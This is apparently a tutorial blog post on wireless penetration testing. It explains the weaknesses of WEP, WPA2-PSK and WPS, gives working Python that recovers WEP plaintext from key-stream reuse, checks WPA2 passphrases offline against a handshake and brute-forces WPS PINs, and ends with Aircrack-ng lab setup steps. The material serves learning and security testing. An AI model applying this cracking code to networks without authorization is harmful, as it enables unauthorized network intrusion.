First of all, to hack you should hack yourself first.
Hack Yourself First
Wireless Testing
Wireless networks are often an easy way to gain access to the internal network from an external vantage point. Years ago, most wireless networks were open, meaning users joining the network were not required to log in. Then Wired Equivalent Privacy (WEP) encryption became popular and accessing the network required an encryption key. Unfortunately, the WEP protocol has many flaws, which make it trivially easy to recover the WEP key and join the network. Now, most wireless networks use Wi-Fi Protected Access (WPA) or Wi-Fi Protected Access 2 (WPA2) in pre-shared key (PSK) mode. WPA/WPA2 is a much better protocol, but a weak PSK can still be cracked offline once a single handshake has been captured. To spare users from creating and typing PSKs, the Wi-Fi Alliance developed the Wi-Fi Protected Setup (WPS) protocol, which allows a wireless access point (WAP) to be preconfigured with a strong PSK and lets a user join the network by providing an eight-digit PIN instead of the passphrase. Unfortunately, WPS also has weaknesses that allow the PIN to be brute-forced in a matter of hours.
Cracking WEP
WEP uses the RC4 stream cipher, keyed with the WEP key, to generate the key stream that is XORed with each packet on the network. Since all clients on the network share the same WEP key, the same key stream would otherwise be used for every packet. When two different plaintexts are encrypted with the same key stream, XORing the two ciphertexts cancels the key stream and leaves the XOR of the two plaintexts; with predictable protocol headers and statistical analysis, parts of the plaintext can be recovered, and the more ciphertexts share a key stream, the more of it falls out. Once one plaintext is known, every other packet encrypted with that key stream follows directly.
To prevent this, WEP prepends a per-packet initialization vector (IV) to the WEP key before generating the key stream and sends the IV in the clear so the receiver can do the same. Unfortunately, the IV is only 24 bits long, so on a busy network IVs repeat (a collision becomes more likely than not after only a few thousand frames), producing duplicate key streams, and a tester can provoke traffic to speed this up. Worse, because the IV forms the first bytes of the RC4 key, statistical attacks on the RC4 key schedule recover the WEP key itself from a few tens of thousands of captured IVs; this is what Aircrack-ng does.
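The key-stream reuse described above, worked through as an added Python example (this is not code from the original guide): a minimal RC4, WEP-style encryption of two constructed frames under one reused IV, recovery of the second frame from the first without ever touching the key, and the birthday-bound estimate of how quickly a 24-bit IV repeats. The WEP key, IV and frame contents are constructed, and the CRC-32 ICV that real WEP appends is left out because it does not change the argument.

```python
"""Added example, not part of the original guide: why a 24-bit IV fails WEP.

Two frames encrypted under the same IV share one RC4 key stream, so XORing
the ciphertexts cancels the key stream and leaves P1 XOR P2.  If one
plaintext is known (WEP traffic is full of predictable headers), the other
follows immediately.  The WEP key, IV and frame payloads are constructed.
"""
import math

# Constructed values: a 40-bit WEP key and an IV the AP happens to reuse.
WEP_KEY = bytes.fromhex("0123456789")
REUSED_IV = bytes.fromhex("a1b2c3")
# Constructed frame payloads of equal length; both start with the same
# predictable LLC/SNAP-style prefix that an attacker can assume.
KNOWN_PREFIX = b"\xaa\xaa\x03\x00\x00\x00\x08\x00"
FRAME_1 = KNOWN_PREFIX + b"predictable header"
FRAME_2 = KNOWN_PREFIX + b"confidential data!"


def rc4_keystream(key: bytes, length: int) -> bytes:
    """Plain RC4: key-scheduling algorithm, then `length` bytes of PRGA output."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    while len(out) < length:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def wep_encrypt(wep_key: bytes, iv: bytes, payload: bytes) -> bytes:
    """WEP per-packet encryption: RC4 keyed with IV || WEP key.

    Real WEP also appends a CRC-32 ICV before encrypting and transmits the IV
    in the clear; the ICV is omitted because it does not affect key-stream reuse.
    """
    if len(iv) != 3:
        raise ValueError("WEP IVs are 24 bits")
    return xor(payload, rc4_keystream(iv + wep_key, len(payload)))


def recover_second_plaintext(c1: bytes, c2: bytes, p1: bytes) -> bytes:
    """Attacker side: C1 XOR C2 = P1 XOR P2, so P2 = C1 XOR C2 XOR P1.
    Works for whichever bytes of P1 the attacker can guess, not only a whole frame."""
    return xor(xor(c1, c2), p1)


def expected_frames_until_iv_collision(iv_bits: int = 24) -> float:
    """Birthday bound: number of frames after which a repeated IV is more
    likely than not.  About 4.8k frames for 24 bits, i.e. minutes on a busy AP."""
    return math.sqrt(2 * 2 ** iv_bits * math.log(2))


def demo() -> bytes:
    """Encrypt two frames under the reused IV, then recover FRAME_2 without the key."""
    c1 = wep_encrypt(WEP_KEY, REUSED_IV, FRAME_1)
    c2 = wep_encrypt(WEP_KEY, REUSED_IV, FRAME_2)
    # From here on only c1, c2 and the guessed FRAME_1 are used.
    return recover_second_plaintext(c1, c2, FRAME_1)


if __name__ == "__main__":
    print(demo())
    print(f"~{expected_frames_until_iv_collision():.0f} frames until a 50% IV collision")
```

Running the block prints the recovered second frame and the collision estimate; the point to notice is that `demo` never reads `WEP_KEY` after the two encryptions, exactly the position a passive sniffer is in.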
Cracking WPA/WPA2 (Pre-Shared Key)
WPA and WPA2 both support a variety of authentication protocols, but the one that can be cracked offline from a single captured handshake is WPA/WPA2 Personal, which uses a pre-shared key (PSK). With WEP, the WEP key was combined with the IV to form each packet key, so the same secret was in play for the whole session. With WPA/WPA2 Personal, a fresh session key is derived during authentication. First, the pairwise master key (PMK) is derived from the passphrase by running it through PBKDF2-HMAC-SHA1 with the SSID as the salt (4096 iterations, 256-bit output); in PSK mode the PMK is the PSK. Then the pairwise transient key (PTK) is derived from the PMK, a random nonce from the client (SNonce), a random nonce from the AP (ANonce), the client MAC address and the AP MAC address. The WPA/WPA2 protocol uses a four-way handshake to exchange the nonces and to prove that both the client and the WAP hold the same PMK: the EAPOL messages carry a message integrity code (MIC) computed with the key confirmation key (KCK), the first 128 bits of the PTK. By capturing the four-way handshake, the tester obtains both nonces, both MAC addresses and a MIC computed under the real KCK. At this point the tester can derive candidate PTKs from many different passphrases offline. If the MIC recomputed from a candidate matches the captured MIC, the passphrase used to derive it is the correct PSK.
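The derivation and offline check described above, as an added Python example (not the original guide's code): PBKDF2 for the PMK, the 802.11 PRF for the PTK, the EAPOL MIC under the KCK, and a dictionary check against a simulated capture. The SSID, passphrases, MAC addresses, nonces and the EAPOL message 2 frame are all constructed here; in a real test they are read from a pcap of the handshake.

```python
"""Added example, not part of the original guide: turning a captured WPA2-PSK
four-way handshake into an offline passphrase check.

    PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes)
    PTK = PRF(PMK, "Pairwise key expansion",
              min(AA, SPA) || max(AA, SPA) || min(ANonce, SNonce) || max(ANonce, SNonce))
    KCK = PTK[0:16]
    MIC = HMAC-SHA1(KCK, EAPOL-Key frame with its MIC field zeroed)[:16]   # WPA2/CCMP

The MAC addresses, nonces, EAPOL frame and candidate passphrases are constructed.
"""
import hashlib
import hmac
from typing import Optional

# Offset of the 16-byte MIC inside an EAPOL-Key frame: 802.1X header (4) +
# descriptor type (1) + key info (2) + key length (2) + replay counter (8) +
# nonce (32) + key IV (16) + key RSC (8) + key ID (8).
MIC_OFFSET = 81
PTK_LEN_CCMP = 48  # KCK (16) || KEK (16) || TK (16)


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """PSK mode: the PMK is derived from the passphrase with the SSID as salt."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf(key: bytes, label: bytes, data: bytes, nbytes: int) -> bytes:
    """IEEE 802.11 PRF-n: HMAC-SHA1(key, label || 0x00 || data || i) for i = 0, 1, ..."""
    out = b""
    for i in range((nbytes + 19) // 20):
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
    return out[:nbytes]


def derive_ptk(pmk, ap_mac, sta_mac, anonce, snonce, nbytes=PTK_LEN_CCMP) -> bytes:
    data = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(anonce, snonce) + max(anonce, snonce)
    return prf(pmk, b"Pairwise key expansion", data, nbytes)


def eapol_mic(kck: bytes, frame_with_zeroed_mic: bytes) -> bytes:
    """Key descriptor version 2 (WPA2/CCMP): HMAC-SHA1 truncated to 128 bits."""
    return hmac.new(kck, frame_with_zeroed_mic, hashlib.sha1).digest()[:16]


def build_msg2(snonce: bytes, replay_counter: int) -> bytes:
    """Constructed EAPOL-Key message 2 of 4 with an all-zero MIC field."""
    body = (b"\x02"                                  # descriptor type: RSN
            + b"\x01\x0a"                            # key info: pairwise, MIC set, version 2
            + b"\x00\x00"                            # key length
            + replay_counter.to_bytes(8, "big")
            + snonce
            + bytes(16) + bytes(8) + bytes(8)        # key IV, key RSC, key ID (unused here)
            + bytes(16)                              # MIC, zero while it is being computed
            + b"\x00\x00")                           # key data length
    return b"\x01\x03" + len(body).to_bytes(2, "big") + body   # 802.1X v1, type EAPOL-Key


def zero_mic(frame: bytes) -> bytes:
    return frame[:MIC_OFFSET] + bytes(16) + frame[MIC_OFFSET + 16:]


def simulate_capture(ssid: str, passphrase: str) -> dict:
    """Station side of the handshake, standing in for a sniffed pcap.
    ANonce would be read from message 1; SNonce and the MIC from message 2."""
    ap_mac = bytes.fromhex("00119c0a0b0c")            # constructed AP MAC
    sta_mac = bytes.fromhex("02ab45000102")           # constructed station MAC
    anonce = hashlib.sha256(b"constructed ANonce").digest()
    snonce = hashlib.sha256(b"constructed SNonce").digest()
    kck = derive_ptk(derive_pmk(passphrase, ssid), ap_mac, sta_mac, anonce, snonce)[:16]
    msg2 = build_msg2(snonce, replay_counter=1)
    msg2 = msg2[:MIC_OFFSET] + eapol_mic(kck, msg2) + msg2[MIC_OFFSET + 16:]
    return {"ssid": ssid, "ap_mac": ap_mac, "sta_mac": sta_mac,
            "anonce": anonce, "snonce": snonce, "msg2": msg2}


def crack(capture: dict, candidates) -> Optional[str]:
    """Recompute the MIC for each candidate passphrase.  The PBKDF2 step is
    the cost that makes a long random PSK impractical to guess."""
    target = capture["msg2"][MIC_OFFSET:MIC_OFFSET + 16]
    zeroed = zero_mic(capture["msg2"])
    for passphrase in candidates:
        pmk = derive_pmk(passphrase, capture["ssid"])
        kck = derive_ptk(pmk, capture["ap_mac"], capture["sta_mac"],
                         capture["anonce"], capture["snonce"])[:16]
        if hmac.compare_digest(eapol_mic(kck, zeroed), target):
            return passphrase
    return None


if __name__ == "__main__":
    cap = simulate_capture("HomeNet", "Sunflower2012")   # constructed SSID and PSK
    print(crack(cap, ["password", "letmein", "Sunflower2012", "qwerty123"]))
```

Everything `crack` uses is visible on the air: SSID from the beacon, MACs from the frame headers, nonces and MIC from the EAPOL frames. Only the PBKDF2 iteration count slows the guessing, which is why the defence is a long, random PSK rather than a short word.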
Cracking Wi-Fi Protected Setup (WPS)
To help users make the transition to the more secure WPA/WPA2 protocol, the Wi-Fi Alliance developed the WPS protocol. With WPS, a WAP can be preconfigured with WPA2 and a strong PSK and can share its configuration with a new device that wants to join the network. To prove that a device is authorized to receive the configuration and join the network, the device must provide a PIN to the WAP. The PIN is preconfigured on the WAP and should be unique to it. The PIN is eight digits long, which should make it impractical to brute-force online. Unfortunately, the protocol was poorly designed: the WAP acknowledges each half of the PIN independently during the exchange, so the tester need only brute-force two four-digit numbers (at most 20,000 attempts instead of 100,000,000). In addition, the last digit of the PIN is a checksum calculated from the first seven digits, so the tester really only needs to brute-force a four-digit number and a three-digit number, at most 11,000 attempts. The combination of these flaws allows a WPS PIN to be brute-forced in a matter of hours, depending on whether the WAP manufacturer has implemented any brute-force mitigations such as locking WPS after repeated failures.
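The checksum and the split verification described above, as an added Python example (not the original guide's code). The registrar (the WAP) is modelled by a hypothetical oracle that answers "first half correct?" and "second half correct?" as separate questions, which is what the real protocol's responses to M4 and M6 reveal; the PIN is constructed and the oracle has no lockout, i.e. no brute-force mitigation.

```python
"""Added example, not part of the original guide: the WPS PIN checksum and
why acknowledging each half of the PIN separately collapses the search.

The registrar is a hypothetical model with split verification and no
lockout.  The PIN it holds is constructed.
"""


def wps_checksum(first_seven: int) -> int:
    """Checksum digit over the first seven PIN digits as the WPS specification
    defines it: weights 3,1,3,1,3,1,3 counted from the rightmost digit."""
    acc = 0
    n = first_seven
    while n:
        acc += 3 * (n % 10)
        n //= 10
        acc += n % 10
        n //= 10
    return (10 - acc % 10) % 10


def valid_pin(pin: str) -> bool:
    return len(pin) == 8 and pin.isdigit() and wps_checksum(int(pin[:7])) == int(pin[7])


def attack_space() -> tuple:
    """Worst-case guesses: checksum alone (10^7) versus split verification
    plus checksum (10^4 for the first half + 10^3 for the second)."""
    return 10 ** 7, 10 ** 4 + 10 ** 3


class RegistrarOracle:
    """Hypothetical WPS registrar: confirms each half on its own, never locks out."""

    def __init__(self, pin: str):
        if not valid_pin(pin):
            raise ValueError("not a valid WPS PIN")
        self._pin = pin
        self.attempts = 0

    def first_half_ok(self, half: str) -> bool:
        """Real protocol: the registrar continues with M5 only if the first
        half proven in M4 matched; otherwise the enrollee gets a NACK."""
        self.attempts += 1
        return half == self._pin[:4]

    def second_half_ok(self, half: str) -> bool:
        """Real protocol: M7 follows only if the second half proven in M6 matched."""
        self.attempts += 1
        return half == self._pin[4:]


def split_bruteforce(oracle: RegistrarOracle) -> str:
    """Recover the PIN with at most 10,000 + 1,000 oracle queries."""
    first = next(f"{i:04d}" for i in range(10_000) if oracle.first_half_ok(f"{i:04d}"))
    for j in range(1_000):
        three = f"{j:03d}"
        # The eighth digit is derived from the other seven, never guessed.
        second = three + str(wps_checksum(int(first + three)))
        if oracle.second_half_ok(second):
            return first + second
    raise RuntimeError("unreachable: a valid PIN is always found within 11,000 queries")


if __name__ == "__main__":
    oracle = RegistrarOracle("95674834")   # constructed PIN
    print(split_bruteforce(oracle), oracle.attempts, attack_space())
```

With the constructed PIN the oracle is queried 10,052 times. A registrar that rate-limits or locks WPS after a handful of failed M4/M6 exchanges turns those hours into days or stops the attack outright, which is the mitigation the text refers to.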
Now we will start it................
Wireless Testing Labs
These labs are designed to teach the student how to use the Aircrack-ng suite of tools and Wifite to attack wireless networks. To complete these labs, the USB wireless card needs to be passed through to the virtual machine. Follow the instructions below to configure Kali Linux to use the USB wireless card.
VirtualBox:
1. From the VirtualBox menu, select Devices.
2. From the Devices menu, select USB Devices.
3. From the USB Devices menu, select the correct wireless card.
VMware Player:
1. From the Player menu, select Removable Devices.
2. From the Removable Devices menu, select the correct wireless card.
Lab 1 – Capture Wireless Packets
The goal of this lab is to confirm that Kali Linux can use the wireless card and can inject packets into the wireless network. This lab must be completed successfully before the remaining labs can be started. Start by using iwconfig to find the wireless interface.
Next, use Airmon-ng to put the wireless interface in monitor mode, so the card captures every frame on the channel rather than only the frames addressed to it. Airmon-ng takes an optional channel argument; if a channel is not specified it will choose one, which is fine for now. Note the message about processes that may cause trouble with the monitor interface (typically the network manager and supplicant), and note the name of the new monitor interface, since the remaining tools operate on it.
Finally, use Aireplay-ng's injection test against the monitor interface to confirm that packet injection works.
After this, watch my next post.